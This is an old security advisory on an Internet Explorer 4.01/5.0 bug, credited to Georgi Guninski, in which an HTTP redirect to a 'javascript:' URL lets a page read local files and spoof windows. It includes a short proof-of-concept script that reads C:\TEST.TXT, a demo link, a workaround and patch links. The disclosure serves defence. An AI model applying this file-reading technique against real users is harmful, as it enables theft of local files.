COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE 4.01, 5.0

PROBLEM

    Georgi Guninski found following.  IE 5.0 allows reading local (and
    from any domain) files and window spoofing using HTTP  redirection
    to "javascript:".

    Internet  Explorer  5.0  under  Windows  95 and WinNT 4.0 (suppose
    Win98  is  vulnerable)  allows  reading  local files and text/HTML
    files from any domain.  Window  spoofing is possible.  It is  also
    possible in some cases to read files behind fiewall.

    The problem is a HTTP redirect to "javascript:" URLs.  If you open
    a local file and the change its location to an URL that  redirects
    to  "javascript:JavaScript  code"  then  the  JavaScript  code  is
    executed in the  security context of  the original local  file and
    has access to its DOM.  The local file may be sent to an arbitrary
    server.   In  a  similar  way  one  may  do window spoofing.  This
    vulnerability  may  be  exploited  using  HTML  email message or a
    newsgroup posting.  The code is:

        <SCRIPT>
        alert("Create a short text file C:\\TEST.TXT and it will be read and shown in a dialog box");
        a=window.open("file://c:/test.txt");
        a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
        </SCRIPT>
        // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect to: "javascript:alert(document.body.innerText)"

    Demonstration is available at:

        http://www.nat.bg/~joro/jsredir1.html

SOLUTION

    Workaround: Disable Active Scripting.  Patch availability:

        - http://www.microsoft.com/downloads
        - http://www.microsoft.com/msdownload/iebuild/jsredir/en/jsredir.htm

    NOTE: The IE 4.01 patch requires IE 4.01 SP2 in order to  install.
    IE 4.01 SP 2 is available at

        http://www.microsoft.com/Windows/ie/download/windows.htm

    NOTE: The patch  will be available  shortly via the  WindowsUpdate
    site.